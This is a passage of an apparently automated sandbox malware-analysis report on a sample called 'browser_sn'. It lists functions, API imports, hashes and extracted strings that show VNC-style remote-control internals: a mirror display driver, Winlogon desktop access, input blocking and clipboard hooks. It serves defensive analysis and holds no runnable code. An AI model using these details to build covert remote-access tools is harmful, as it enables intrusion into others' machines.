                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
                                                                            • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                            • API String ID: 4207610217-3713657650
                                                                            • Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                            • Instruction ID: 232d5173c6dce9173457acd39d1b9d3210a811f7c7b5371d8943b3ca2c8e1140
                                                                            • Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                            • Instruction Fuzzy Hash: 62C17D61A18A8285EBA0DF24A8402BA73B0FF9578DF444536DE8E87B94DFBCD119C740
                                                                            Function 00007FF6C2BB0330 Relevance: 56.2, APIs: 20, Strings: 12, Instructions: 220windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Delete$Object$Palette$ErrorLast$Select$CreateEntriesSystem$ColorCompatibleRealizeTable
                                                                            • String ID: vncdesktop.cpp : framebuffer has %u palette entries$vncdesktop.cpp : initialised palette OK$vncdesktop.cpp : no palette data for truecolour display$vncdesktop.cpp : unable to allocate logical palette$vncdesktop.cpp : unable to create HPALETTE$vncdesktop.cpp : unable to create temporary DC$vncdesktop.cpp : unable to get system palette entries$vncdesktop.cpp : unable to restore temporary DC bitmap$vncdesktop.cpp : unable to select DIB section into temporary DC$vncdesktop.cpp : unable to select() HPALETTE$vncdesktop.cpp : unable to set DIB section palette$vncdesktop.cpp : warning - failed to RealizePalette
                                                                            • API String ID: 463275814-2693335352
                                                                            • Opcode ID: d6a9e890ac1b439b16467652600ec118084fc3769fd8e43bc3eb75ddb6ca802c
                                                                            • Instruction ID: 487065355ea8d84d066f486a3bb1f99205453023801270a01210590b86444f0f
                                                                            • Opcode Fuzzy Hash: d6a9e890ac1b439b16467652600ec118084fc3769fd8e43bc3eb75ddb6ca802c
                                                                            • Instruction Fuzzy Hash: 46A16E25A0C68785FB90DF6598942B923B1EF96B4EF444832CE8ED7751DEBCE00AC744
                                                                            Function 00007FF6C2B85A60 Relevance: 50.9, APIs: 17, Strings: 12, Instructions: 154libraryloaderfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
                                                                            • String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
                                                                            • API String ID: 1650122287-1031704962
                                                                            • Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                            • Instruction ID: c61ab56d0d3e73c589b15ec40c44756f638dfafc8db18c578f877b10b8a58f0c
                                                                            • Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                            • Instruction Fuzzy Hash: 7081F635908A8691EB91CF20E4543AD37A0FB59B9EF444172DE9E8B398DFB8E245C350
                                                                            Function 00007FF6C2C3A228 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
                                                                            • String ID: ./\
                                                                            • API String ID: 385398445-3176372042
                                                                            • Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                            • Instruction ID: 715c7e59ce932da5dfe2bcfd81bf129397caea0c2558b36d5f5fec9edf4ca4f1
                                                                            • Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                            • Instruction Fuzzy Hash: ABE1A122A0C24286EBA09F21A4542BE77B0FB4575AF504935EFCD93B95DFBDE460CB00
                                                                            Function 00007FF6C2B91D10 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 209libraryloadersleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$AddressLibraryLoadProcProcess$CreatePrivateProfile$BlockEnvironmentSleepUser$ActiveCloseConsoleCurrentDestroyFileHandleModuleNameOpenSessionStringVersion
                                                                            • String ID: LockWorkStation$WinStationConnectW$Winsta0\Winlogon$h$user32.dll$winsta.dll
                                                                            • API String ID: 2898369102-3720325205
                                                                            • Opcode ID: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                                            • Instruction ID: 6f5894cdc6f4c2acdde6d05ba2a7d57b4cc54a1a993c7646ea28908ad09e6f49
                                                                            • Opcode Fuzzy Hash: a88697ad3902970c94e634d2ee006443711aca9222aabfc6e9aa9b8f1b329622
                                                                            • Instruction Fuzzy Hash: CBA12730A18A8282E6A0AF15A8442B973B0FFA579EF444135DECDC3B64DFBCE459D740
                                                                            Function 00007FF6C2BB3460 Relevance: 44.1, APIs: 13, Strings: 12, Instructions: 369windowclipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Window$CriticalProcSection$ClipboardEnterLeaveLongMessageNotifyOwnerSend
                                                                            • String ID: vncdesktopsink.cpp : Monitor22 %i$vncdesktopsink.cpp : Monitor222 %i$vncdesktopsink.cpp : Monitor3 %i %i$vncdesktopsink.cpp : Power3 %i %i$vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : failed to set system hooks$vncdesktopsink.cpp : set SC hooks OK$vncdesktopsink.cpp : set W8 hooks OK$vncdesktopsink.cpp : set hooks OK$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                            • API String ID: 378279424-2704384803
                                                                            • Opcode ID: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                                            • Instruction ID: 61d7ac766ca9dcc3ae9e13df29f56a4a257eea8269ba64a1ececf5f9962b70ec
                                                                            • Opcode Fuzzy Hash: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                                            • Instruction Fuzzy Hash: 2A026121B086C296FB689F65C5946B863A0FF46B4EF544536CF9E93390CFBCA458D301
                                                                            Function 00007FF6C2BAE780 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 204libraryloadertimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
                                                                            • String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
                                                                            • API String ID: 33112563-1779637096
                                                                            • Opcode ID: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                            • Instruction ID: 4373ab196080a6c4d1bee11e95ddc24bc4fa1e356d0a467640e0aa157cf41041
                                                                            • Opcode Fuzzy Hash: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                            • Instruction Fuzzy Hash: D2B11732508BC18AE368CF64F85469AB7A4FB44B09F94493ACBEA86350CFBDF055C754
                                                                            Function 00007FF6C2BB54A0 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 301COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DataRegion$CriticalSection$CreateEnterLeaveRect
                                                                            • String ID: F
                                                                            • API String ID: 2411647221-1304234792
                                                                            • Opcode ID: cc642ca3bff3ad97ef2125c9e7fe796bc43ee1a04bd7d1332a209876cd4ebe06
                                                                            • Instruction ID: 588f6dd20e1a247b0781e64c4cd7a872b2fa91bc705b2c3dc7b491964bf154f8
                                                                            • Opcode Fuzzy Hash: cc642ca3bff3ad97ef2125c9e7fe796bc43ee1a04bd7d1332a209876cd4ebe06
                                                                            • Instruction Fuzzy Hash: 9FC1B122708A8186E750DF26E8847AA77A1FB89B8EF558031DF8E83755DFBCE445C700
                                                                            Function 00007FF6C2B83770 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 192timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
                                                                            • String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
                                                                            • API String ID: 2697070071-1399849103
                                                                            • Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                            • Instruction ID: cbf8263b789308a93e6d1a2b25325af88bd7db3a07566bfa2d25a85b05a473ec
                                                                            • Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                            • Instruction Fuzzy Hash: 4481813561878286EB94DF25AC0466A73A5FF89B8AF485135DECE87B64DF7CE004DB00
                                                                            Function 00007FF6C2B91100 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 331filesleeplibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMultiNamedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
                                                                            • String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
                                                                            • API String ID: 2145620463-2328478964
                                                                            • Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                            • Instruction ID: 472f533ba8289682c68925aa26ada8a21cc79d489671a22e5a8348546e49ef55
                                                                            • Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                            • Instruction Fuzzy Hash: 63E1DE22A18A828AF760DF28D8442AA73B0FB5579DF404231DE8E87B94DFBCD655D740
                                                                            Function 00007FF6C2B99740 Relevance: 38.7, APIs: 7, Strings: 15, Instructions: 246libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
                                                                            • String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
                                                                            • API String ID: 524771730-2664985301
                                                                            • Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                            • Instruction ID: f9619f36da08bdb6b80cbe2701b88bda98dbe11986ece36b6cc3b41f816eb4c8
                                                                            • Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                            • Instruction Fuzzy Hash: 55D10A25A09B8695E794CF25A98427937B0FB09769F404236DFACD37A0DFBCE529C700
                                                                            Function 00007FF6C2B97B90 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 227fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateDescriptorSecurity$EventFile$MappingSaclView$ConvertDaclErrorInitializeLastString
